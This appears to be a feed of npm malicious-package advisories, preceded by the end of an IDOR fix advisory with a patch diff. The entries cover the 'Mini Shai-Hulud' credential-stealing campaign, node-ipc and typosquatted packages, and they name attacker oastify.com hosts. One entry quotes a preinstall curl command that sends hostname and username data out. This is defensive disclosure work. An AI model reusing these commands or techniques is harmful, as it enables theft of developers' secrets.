resolve both the URL `issue_id` and the body `depends_on_issue_id` against `IssueService.get(workspace_id, ...)` before allowing the dependency to be written. ## Suggested Fix Resolve every issue id (URL and body) against `workspace_id` at the route layer before dispatching. The route helper from the issue-IDOR companion advisory can be reused. ```diff --- a/src/praisonai-platform/praisonai_platform/api/routes/dependencies.py +++ b/src/praisonai-platform/praisonai_platform/api/routes/dependencies.py @@ -22,11 +22,16 @@ @router.post("/", response_model=DependencyResponse, status_code=status.HTTP_201_CREATED) async def create_dependency( workspace_id: str, issue_id: str, body: DependencyCreate, user: AuthIdentity = Depends(require_workspace_member), session: AsyncSession = Depends(get_db), ): + issue_svc = IssueService(session) + if await issue_svc.get(workspace_id, issue_id) is None: + raise HTTPException(status_code=404, detail="Issue not found") + if await issue_svc.get(workspace_id, body.depends_on_issue_id) is None: + raise HTTPException(status_code=404, detail="depends_on_issue_id not found in this workspace") svc = DependencyService(session) dep = await svc.create(issue_id, body.depends_on_issue_id, body.type) return DependencyResponse.model_validate(dep) ``` Apply the same `issue_svc.get(workspace_id, issue_id)` precondition to `list_dependencies` and `delete_dependency` (verifying both the issue and the dependency belong to `workspace_id`).
Risiko ? / 10 MAL-2026-4740 vor 2 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (370d1632254cb5b5dbd394992054b6c0e943a6fb758ab70f470c059ee734b9c0) The package is published as 'zod-to-js' but ships a copy of pino's source tree (main entry `pino.js`, lib/proto.js, lib/levels.js, pino docs/README) with a description copy-pasted from inquirer and homepage `https://getpino.io` — a deceptive identity unrelated to its declared name. On `require('zod-to-js')`, the load chain reaches `lib/writer.js`, which attempts `require('modustack')` and, on failure, executes `execSync('npm install modustack --no-warnings --no-save --no-progress --loglevel silent', { windowsHide: true })` followed by `require('../../modustack/pino.js')`. The install is unpinned, has no integrity check, and runs whatever bytes the attacker currently publishes under the `modustack` name. The same file contains additional staging scaffolding — a `String.fromCharCode`-based string builder and a `getMacAddress()` helper that enumerates non-internal interface MACs but is unreferenced in the visible code path — consistent with a loader/dropper shaped for evasion. Any consumer that imports this package triggers attacker-controlled code execution on the installer's machine. ## Source: ghsa-malware (2d6317e5fa185151e459e546f886a0fc62b6bc96cee48ba19e7a18bd0f2ba268) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Risiko ? / 10 MAL-2026-4159 vor 2 Stunde(n)
Part of the **Mini Shai-Hulud** supply chain attack campaign in which a threat actor compromised the npm account `atool` and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a `preinstall` hook that executes a 498KB obfuscated Bun script, using the GitHub API as a covert exfiltration channel. Credentials are committed to attacker-controlled repositories following Dune-themed naming patterns (e.g., `harkonnen-melange-742`). Stolen data includes AWS keys, GitHub PATs, npm tokens, GCP service accounts, Azure credentials, Kubernetes service account tokens, SSH keys, Docker auth configs, database connection strings, Stripe keys, and Slack tokens. Malicious versions also establish persistence via CI/CD workflow injection (a GitHub Actions workflow named `Run Copilot` dumps all secrets via `toJSON(secrets)`), AI agent session hooks, and a system daemon named `kitty-monitor`. This specific package (`xmorse`) was modified to include a malicious `preinstall` hook executing the obfuscated Bun payload. --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (071a7f36a645d7ae5c231f30aca8bc53d5fb495070309136c5e16d28dba3c9f4) The package xmorse was found to contain malicious code. ## Source: ghsa-malware (6846040a949cddfcd2476ab8165f12d75dfd50dbafc324b8678beed416e76bfa) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. ## Source: google-open-source-security (847ef6b381d410bf176f7414a6f0fbbcf46a5f39b6d9011e126b279bd2d781df) This package was compromised as part of the ongoing "Mini Shai-Hulud is back" worm by the TeamPCP threat actor. The package will steal credentials and then propogate it to every package it has access to. The package also attempts to remain persistent.
Risiko ? / 10 MAL-2026-4158 vor 2 Stunde(n)
Part of the **Mini Shai-Hulud** supply chain attack campaign in which a threat actor compromised the npm account `atool` and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a `preinstall` hook that executes a 498KB obfuscated Bun script, using the GitHub API as a covert exfiltration channel. Credentials are committed to attacker-controlled repositories following Dune-themed naming patterns (e.g., `harkonnen-melange-742`). Stolen data includes AWS keys, GitHub PATs, npm tokens, GCP service accounts, Azure credentials, Kubernetes service account tokens, SSH keys, Docker auth configs, database connection strings, Stripe keys, and Slack tokens. Malicious versions also establish persistence via CI/CD workflow injection (a GitHub Actions workflow named `Run Copilot` dumps all secrets via `toJSON(secrets)`), AI agent session hooks, and a system daemon named `kitty-monitor`. This specific package (`word-width`) was modified to include a malicious `preinstall` hook executing the obfuscated Bun payload. --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (317b098e8f677cfd13331e699d8b6ed48b13969fb148422826a0364c774aa250) The package word-width was found to contain malicious code. ## Source: ghsa-malware (11bc542fd604f061195468b58d69955c5eaea7cfe519f02cba65d9bca4216bf7) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. ## Source: google-open-source-security (847ef6b381d410bf176f7414a6f0fbbcf46a5f39b6d9011e126b279bd2d781df) This package was compromised as part of the ongoing "Mini Shai-Hulud is back" worm by the TeamPCP threat actor. The package will steal credentials and then propogate it to every package it has access to. The package also attempts to remain persistent.
Risiko ? / 10 MAL-2026-4254 vor 2 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (84d7572f96294e867b18a0448ac0e70af3d08769749aa73388b38d88492559e4) package.json declares `preinstall: node index.js`, so installation automatically executes index.js. The script reads /etc/passwd via fs.readFileSync, collects hostname, username, platform, cwd, and home directory from the os module, slices the first 30 entries of process.env (which on CI typically include AWS_*, GITHUB_TOKEN, NPM_TOKEN, and similar credentials), and HTTPS-POSTs the JSON payload to `3nrgzlqwix6erldow0s0kttsojuai36s.oastify.com` — a Burp Collaborator out-of-band exfiltration subdomain. The package name and description ('package of the reactive-cdk-app of the aws') impersonate AWS CDK naming, fitting a typosquat-with-payload pattern. Any developer or CI system running `npm install reactive-cdk-app` leaks host identity, the local user database, and a bulk slice of environment secrets to the attacker. ## Source: ghsa-malware (171cafb2d7e5b500dd92fe5d46da3a09b37ac9ff62af885241b41e8401746144) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. ## Source: ossf-package-analysis (d01657e9ca5ae8e8f34576437bbc86bb276c83d99dfd1563da57fe880a6ac6fd) The OpenSSF Package Analysis project identified 'reactive-cdk-app' @ 1.0.1 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity.
Risiko ? / 10 MAL-2026-4154 vor 2 Stunde(n)
Part of the **Mini Shai-Hulud** supply chain attack campaign in which a threat actor compromised the npm account `atool` and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a `preinstall` hook that executes a 498KB obfuscated Bun script, using the GitHub API as a covert exfiltration channel. Credentials are committed to attacker-controlled repositories following Dune-themed naming patterns (e.g., `harkonnen-melange-742`). Stolen data includes AWS keys, GitHub PATs, npm tokens, GCP service accounts, Azure credentials, Kubernetes service account tokens, SSH keys, Docker auth configs, database connection strings, Stripe keys, and Slack tokens. Malicious versions also establish persistence via CI/CD workflow injection (a GitHub Actions workflow named `Run Copilot` dumps all secrets via `toJSON(secrets)`), AI agent session hooks, and a system daemon named `kitty-monitor`. This specific package (`slice.js`) was modified to include a malicious `preinstall` hook executing the obfuscated Bun payload. --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (d521db94d90cc0e0ae59910784a4c789b3f6375f9da2a47fc412373603a7359f) The package slice.js was found to contain malicious code. ## Source: ghsa-malware (e3ac482f0cb278e414b9a51de8922092441f3144e7477b421e150a5e4e5f8cb4) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. ## Source: google-open-source-security (847ef6b381d410bf176f7414a6f0fbbcf46a5f39b6d9011e126b279bd2d781df) This package was compromised as part of the ongoing "Mini Shai-Hulud is back" worm by the TeamPCP threat actor. The package will steal credentials and then propogate it to every package it has access to. The package also attempts to remain persistent.
Risiko ? / 10 MAL-2026-4151 vor 2 Stunde(n)
Part of the **Mini Shai-Hulud** supply chain attack campaign in which a threat actor compromised the npm account `atool` and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a `preinstall` hook that executes a 498KB obfuscated Bun script, using the GitHub API as a covert exfiltration channel. Credentials are committed to attacker-controlled repositories following Dune-themed naming patterns (e.g., `harkonnen-melange-742`). Stolen data includes AWS keys, GitHub PATs, npm tokens, GCP service accounts, Azure credentials, Kubernetes service account tokens, SSH keys, Docker auth configs, database connection strings, Stripe keys, and Slack tokens. Malicious versions also establish persistence via CI/CD workflow injection (a GitHub Actions workflow named `Run Copilot` dumps all secrets via `toJSON(secrets)`), AI agent session hooks, and a system daemon named `kitty-monitor`. This specific package (`relationship.js`) was modified to include a malicious `preinstall` hook executing the obfuscated Bun payload. --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (4324b85858ba8faec0ed3dc78f1bb2dd809f382193f05ac8a80f66bca7daac3b) The package relationship.js was found to contain malicious code. ## Source: ghsa-malware (25b556d8b156bf8b6dfd72b231b25f3483fa3cdcc8b65a7fd3cd6498c9981459) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. ## Source: google-open-source-security (847ef6b381d410bf176f7414a6f0fbbcf46a5f39b6d9011e126b279bd2d781df) This package was compromised as part of the ongoing "Mini Shai-Hulud is back" worm by the TeamPCP threat actor. The package will steal credentials and then propogate it to every package it has access to. The package also attempts to remain persistent.
Risiko ? / 10 MAL-2026-2909 vor 2 Stunde(n)
tailwind-typography-cssstyle is a malicious npm package that when imported downloads a C2 dropper (part of PolinRider campaign) from crypto transactions and executes it. --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (1b288c82be557febbb919054bf80821b244285d89b553f3d1dfcd15d88f43f70) The package tailwind-typography-cssstyle was found to contain malicious code. ## Source: ghsa-malware (4d7c7cd61935352bd39aa3e74dbfe6fe26b974ec2a9aecef130c3eb8b5560f7f) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Risiko ? / 10 MAL-2026-4644 vor 2 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (57967d58233d74f2fc4f9b0dee7c050370eb388050df8d63f29e719f83468d73) On `npm install`, the package's postinstall script (postinstall.js) collects host identifiers and CI context — whoami, os.hostname(), os.platform(), cwd, CI, GITHUB_REPOSITORY, NODE_ENV — and sends them off the installer's machine via two channels: an HTTPS GET to `6v2j7oyzq0ehzolr4303sw1vwm2gqje8.oastify.com` (a Burp Collaborator out-of-band callback host) at path `/microsft?`, and a DNS lookup of `.6v2j7oyzq0ehzolr4303sw1vwm2gqje8.oastify.com` to leak the username via DNS even when HTTPS egress is blocked. The package name impersonates Microsoft's Power Platform Playwright tooling namespace, and the exfil path token `microsft` (note the misspelling) serves as a campaign tag. The script self-describes as a 'security research canary' / 'Takeover By lobo', but installers have not consented to off-host data transmission and the captured data (GitHub repository identifier, CI flag, hostname, username) is direct reconnaissance value to whoever controls the OAST subdomain. ## Source: ghsa-malware (737b1098ebca3d62e2482585023769cf25db3b912a8d31a3785466625169db1e) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Risiko ? / 10 MAL-2026-4274 vor 2 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (f68653eed66e7343973bc919788864990337f7645072d32a9d7465d4bf4ff4e7) On `npm install`, postinstall.js executes `whoami`, `id`, and reads `os.hostname()`, `os.platform()`, `process.cwd()`, and CI/GitHub environment variables, then sends the collected data as query-string parameters via HTTPS GET to `br6o3tu4m5amvthw08w8o1x0srykmia7.oastify.com` (a Burp Collaborator out-of-band callback domain). The script also performs a DNS lookup of `.` as a secondary exfiltration channel. The package name impersonates Microsoft Power Apps and the request path includes `/microsft` (sic), indicating supply-chain reconnaissance against developers searching for Microsoft Power Apps tooling. Installing this package on a developer workstation or CI runner leaks host identity and pipeline environment metadata to an attacker-controlled collaborator endpoint. ## Source: ghsa-malware (8c06ef83363f4c65d760bd03135a02a6593ce746e6d2baf5818650798a36c8f1) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. ## Source: ossf-package-analysis (0b922ce655232ea983139e44d430965cdcc1d9784d1628419b4cbef0f5f52073) The OpenSSF Package Analysis project identified 'power-apps' @ 2.0.4 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity. - The package executes one or more commands associated with malicious behavior.
Risiko ? / 10 MAL-2026-4149 vor 2 Stunde(n)
Part of the **Mini Shai-Hulud** supply chain attack campaign in which a threat actor compromised the npm account `atool` and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a `preinstall` hook that executes a 498KB obfuscated Bun script, using the GitHub API as a covert exfiltration channel. Credentials are committed to attacker-controlled repositories following Dune-themed naming patterns (e.g., `harkonnen-melange-742`). Stolen data includes AWS keys, GitHub PATs, npm tokens, GCP service accounts, Azure credentials, Kubernetes service account tokens, SSH keys, Docker auth configs, database connection strings, Stripe keys, and Slack tokens. Malicious versions also establish persistence via CI/CD workflow injection (a GitHub Actions workflow named `Run Copilot` dumps all secrets via `toJSON(secrets)`), AI agent session hooks, and a system daemon named `kitty-monitor`. This specific package (`onfire.js`) was modified to include a malicious `preinstall` hook executing the obfuscated Bun payload. --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (a9060482f202ee6dc921bcdf0d1a33011a60dddfbc63fa40cbd7ca781ef08eca) The package onfire.js was found to contain malicious code. ## Source: ghsa-malware (851e759daa33ad43bdd677b713845e8d6792215c4c8264b2440350b56939e20d) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. ## Source: google-open-source-security (847ef6b381d410bf176f7414a6f0fbbcf46a5f39b6d9011e126b279bd2d781df) This package was compromised as part of the ongoing "Mini Shai-Hulud is back" worm by the TeamPCP threat actor. The package will steal credentials and then propogate it to every package it has access to. The package also attempts to remain persistent.
Risiko ? / 10 MAL-2026-3326 vor 2 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (77d8076c0caa289734b5a30b904f9a075ae0d55ea3fc74f665806d913efe7d28) The package paychex-common-vendor-lib was found to contain malicious code. ## Source: ghsa-malware (84d0d410556e645e007d1bed16359bdd26ef5667b47fea66d1bc4601f61e3932) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. ## Source: ossf-package-analysis (56ec286ed47dfe01871f3459bbf2c85defe54c4dd04034a318781c95304b0591) The OpenSSF Package Analysis project identified 'paychex-common-vendor-lib' @ 100.0.0 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity. - The package executes one or more commands associated with malicious behavior.
Risiko ? / 10 MAL-2023-1274 vor 2 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (c87e5ff9b7fca2cbd9b8c5f66c8849dd5f06f3e36574d1e902b216d332a207ac) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. ## Source: ossf-package-analysis (a99e687fc95d5a9c89c172be323b2b74f8ef382e895f7b92ce48b15f1d764d08) The OpenSSF Package Analysis project identified 'proton-pack' @ 99.99.999 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity.
Risiko ? / 10 MAL-2026-4612 vor 2 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (755d0176c106903bf2baaf14d0bb4df611bb719c2a7b0615e9b4487eadee1300) On `npm install`, the package's preinstall lifecycle hook executes `node index.js && curl --data-urlencode "info=$(hostname && whoami)" http://8irluql1d21jmq8tr5n5fyoxjopfdd12.oastify.com/nasa/mmt-static`. index.js reads `/etc/passwd`, collects `os.hostname()`, `os.platform()`, `os.userInfo().username`, current working directory, and the first 30 entries of `process.env`, then POSTs the JSON payload to `https://3nrgzlqwix6erldow0s0kttsojuai36s.oastify.com/nasa/mmt-static/`. The package additionally exhibits dependency-confusion shape: its description claims to be an AWS internal CDK package (`cdk-sagemaker-notebook-workflow`) and the README contains `Takeover By l0bo`, indicating an intentional name-squat against an AWS-internal namespace. Installing this package leaks the installer's hostname, username, local user database, working directory, and environment variables (which commonly contain CI/CD secrets, cloud credentials, and tokens) to attacker-controlled Burp Collaborator (oastify.com) endpoints. ## Source: ghsa-malware (8459650553ee494191b0a2f03104e537518003f05ab481da8256157746c79c33) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Risiko ? / 10 MAL-2026-4148 vor 2 Stunde(n)
Part of the **Mini Shai-Hulud** supply chain attack campaign in which a threat actor compromised the npm account `atool` and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a `preinstall` hook that executes a 498KB obfuscated Bun script, using the GitHub API as a covert exfiltration channel. Credentials are committed to attacker-controlled repositories following Dune-themed naming patterns (e.g., `harkonnen-melange-742`). Stolen data includes AWS keys, GitHub PATs, npm tokens, GCP service accounts, Azure credentials, Kubernetes service account tokens, SSH keys, Docker auth configs, database connection strings, Stripe keys, and Slack tokens. Malicious versions also establish persistence via CI/CD workflow injection (a GitHub Actions workflow named `Run Copilot` dumps all secrets via `toJSON(secrets)`), AI agent session hooks, and a system daemon named `kitty-monitor`. This specific package (`miz`) was modified to include a malicious `preinstall` hook executing the obfuscated Bun payload. --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (78c167f4bf12240ca2c030704859fae2e10b3de3671d0c0bbf6308d3695609a3) The package miz was found to contain malicious code. ## Source: ghsa-malware (0b8b852f2915a1ea3ac9a3dc75e75351c26bb8926c9c79b99d582e1a57100ed9) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. ## Source: google-open-source-security (847ef6b381d410bf176f7414a6f0fbbcf46a5f39b6d9011e126b279bd2d781df) This package was compromised as part of the ongoing "Mini Shai-Hulud is back" worm by the TeamPCP threat actor. The package will steal credentials and then propogate it to every package it has access to. The package also attempts to remain persistent.
Risiko ? / 10 MAL-2026-4143 vor 2 Stunde(n)
Part of the **Mini Shai-Hulud** supply chain attack campaign in which a threat actor compromised the npm account `atool` and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a `preinstall` hook that executes a 498KB obfuscated Bun script, using the GitHub API as a covert exfiltration channel. Credentials are committed to attacker-controlled repositories following Dune-themed naming patterns (e.g., `harkonnen-melange-742`). Stolen data includes AWS keys, GitHub PATs, npm tokens, GCP service accounts, Azure credentials, Kubernetes service account tokens, SSH keys, Docker auth configs, database connection strings, Stripe keys, and Slack tokens. Malicious versions also establish persistence via CI/CD workflow injection (a GitHub Actions workflow named `Run Copilot` dumps all secrets via `toJSON(secrets)`), AI agent session hooks, and a system daemon named `kitty-monitor`. This specific package (`limit-size`) was modified to include a malicious `preinstall` hook executing the obfuscated Bun payload. --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (508106fa3e115982a98a9ade146af3ddf75ed2270766e06e5307c431e71acf41) The package limit-size was found to contain malicious code. ## Source: ghsa-malware (6424ce3911963a0ae9a9bbff02c6325ea3a0a5459d2ae49d2bb6d360d4394083) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. ## Source: google-open-source-security (847ef6b381d410bf176f7414a6f0fbbcf46a5f39b6d9011e126b279bd2d781df) This package was compromised as part of the ongoing "Mini Shai-Hulud is back" worm by the TeamPCP threat actor. The package will steal credentials and then propogate it to every package it has access to. The package also attempts to remain persistent.
Risiko ? / 10 MAL-2026-3744 vor 2 Stunde(n)
Three versions of node-ipc (9.1.6, 9.2.3, 12.0.1) were published to npm on May 14, 2026 by a compromised maintainer account (atiertant). Each version contains an identical 80KB obfuscated payload appended to node-ipc.cjs that steals over 100 categories of sensitive files (SSH keys, cloud provider credentials, .env files, Kubernetes configs, AI tool configurations) and exfiltrates them as gzipped tar archives via DNS tunneling. --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (510f4689fde6aaa371d3326fe3cb2f9cf33c0821c38d0166359e870c5c836b8d) node-ipc version 9.2.3 contains a heavily obfuscated module (node-ipc.cjs with hex-mangled identifiers such as _0xaed59b, _0x282d65, _0x4524e4, _0x41d0c3) introduced by the maintainer as protestware. The obfuscated code, loaded on module import, performs geolocation lookups against installer-side IP data and, for hosts resolving to certain regions, overwrites and/or creates files on the installer's filesystem (historically writing 'peace' messages to the user's Desktop and, in related releases from the same maintainer, recursively overwriting files with a heart character). The payload fires whenever this package is loaded as a dependency — including transitively via popular downstream packages — without any consent from the installer. This is destructive, geolocation-gated sabotage executed on the installer's machine at module load time. ## Source: ghsa-malware (d88176a3441259cee605e58c4967e970a8c7bec952fcaea81f0c2ba4f23c5e5e) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Risiko ? / 10 MAL-2026-3363 vor 2 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (757aca74d8d75ecde7421f2c632969a5b34c11a279d9d28b75755c2ca0825ceb) The package mrdaa-frontend was found to contain malicious code. ## Source: ghsa-malware (0b6c586cd7adad52516658de8bbb3eb18f166350414f223fd73fe34a240d6948) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. ## Source: ossf-package-analysis (ca0f1691dee1aebef2c443074b613ccf344f0af7812cc9a434b270649523ed6e) The OpenSSF Package Analysis project identified 'mrdaa-frontend' @ 99.2.1 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity. - The package executes one or more commands associated with malicious behavior.
Risiko ? / 10 MAL-2026-3241 vor 2 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (8ff3e52e4957291f626e1225ab3b81194c80cd8c6037f943298f6170f98dbe9b) The package nextjs-chat-with-ai-service was found to contain malicious code. ## Source: ghsa-malware (f8d48f7c46da7693f8c544c03bb5f1d94e0162374ca0ca81a8175695c4420f8c) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. ## Source: ossf-package-analysis (65cc0b46517cf92afa63e78b4bab53d01aa4592f31b5d94225bba97bd3d7441a) The OpenSSF Package Analysis project identified 'nextjs-chat-with-ai-service' @ 99.9.9 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity.
Risiko ? / 10 MAL-2026-2926 vor 2 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (45efd49ad74d002b46224881218cf53c763e58c0b71ed3d3ff3a79d1021f3a64) The package material-ui-plugin-cache-endpoint was found to contain malicious code. ## Source: ghsa-malware (052e89f8cbbd6b36a7e088f0a341e529f4a28e05dd7ccfb12266f586a45f577d) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. ## Source: ossf-package-analysis (c2bbd186eca5601f3f1cd839d7e916af5739e014ac917ef6891f0042b0678da1) The OpenSSF Package Analysis project identified 'material-ui-plugin-cache-endpoint' @ 99.9.9 (npm) as malicious. It is considered malicious because: - The package executes one or more commands associated with malicious behavior.
Risiko ? / 10 MAL-2026-4140 vor 2 Stunde(n)
Part of the **Mini Shai-Hulud** supply chain attack campaign in which a threat actor compromised the npm account `atool` and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a `preinstall` hook that executes a 498KB obfuscated Bun script, using the GitHub API as a covert exfiltration channel. Credentials are committed to attacker-controlled repositories following Dune-themed naming patterns (e.g., `harkonnen-melange-742`). Stolen data includes AWS keys, GitHub PATs, npm tokens, GCP service accounts, Azure credentials, Kubernetes service account tokens, SSH keys, Docker auth configs, database connection strings, Stripe keys, and Slack tokens. Malicious versions also establish persistence via CI/CD workflow injection (a GitHub Actions workflow named `Run Copilot` dumps all secrets via `toJSON(secrets)`), AI agent session hooks, and a system daemon named `kitty-monitor`. This specific package (`jest-less-loader`) was modified to include a malicious `preinstall` hook executing the obfuscated Bun payload. --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (6cdad059d3410191a951840c7010fe2e8c93f98805e8e8cd4ed4265221ca0f68) The package jest-less-loader was found to contain malicious code. ## Source: ghsa-malware (3c9e8da2de2ea5f73303c6c3f710a86b7650ef92a7b772691aabc8b7bd320669) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. ## Source: google-open-source-security (847ef6b381d410bf176f7414a6f0fbbcf46a5f39b6d9011e126b279bd2d781df) This package was compromised as part of the ongoing "Mini Shai-Hulud is back" worm by the TeamPCP threat actor. The package will steal credentials and then propogate it to every package it has access to. The package also attempts to remain persistent.
Risiko ? / 10 MAL-2026-4137 vor 2 Stunde(n)
Part of the **Mini Shai-Hulud** supply chain attack campaign in which a threat actor compromised the npm account `atool` and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a `preinstall` hook that executes a 498KB obfuscated Bun script, using the GitHub API as a covert exfiltration channel. Credentials are committed to attacker-controlled repositories following Dune-themed naming patterns (e.g., `harkonnen-melange-742`). Stolen data includes AWS keys, GitHub PATs, npm tokens, GCP service accounts, Azure credentials, Kubernetes service account tokens, SSH keys, Docker auth configs, database connection strings, Stripe keys, and Slack tokens. Malicious versions also establish persistence via CI/CD workflow injection (a GitHub Actions workflow named `Run Copilot` dumps all secrets via `toJSON(secrets)`), AI agent session hooks, and a system daemon named `kitty-monitor`. This specific package (`jest-date-mock`) was modified to include a malicious `preinstall` hook executing the obfuscated Bun payload. --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (b3df85d2164a07e86bd03a9bc93789274a527618c9c04b8da49a4ddc8d572ae9) The package jest-date-mock was found to contain malicious code. ## Source: ghsa-malware (d23a1acac272ac9e35e6ba0e04b5ab57b6b15e11ffaed23d9096e06b11f037e9) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. ## Source: google-open-source-security (847ef6b381d410bf176f7414a6f0fbbcf46a5f39b6d9011e126b279bd2d781df) This package was compromised as part of the ongoing "Mini Shai-Hulud is back" worm by the TeamPCP threat actor. The package will steal credentials and then propogate it to every package it has access to. The package also attempts to remain persistent.
Risiko ? / 10 MAL-2026-4134 vor 2 Stunde(n)
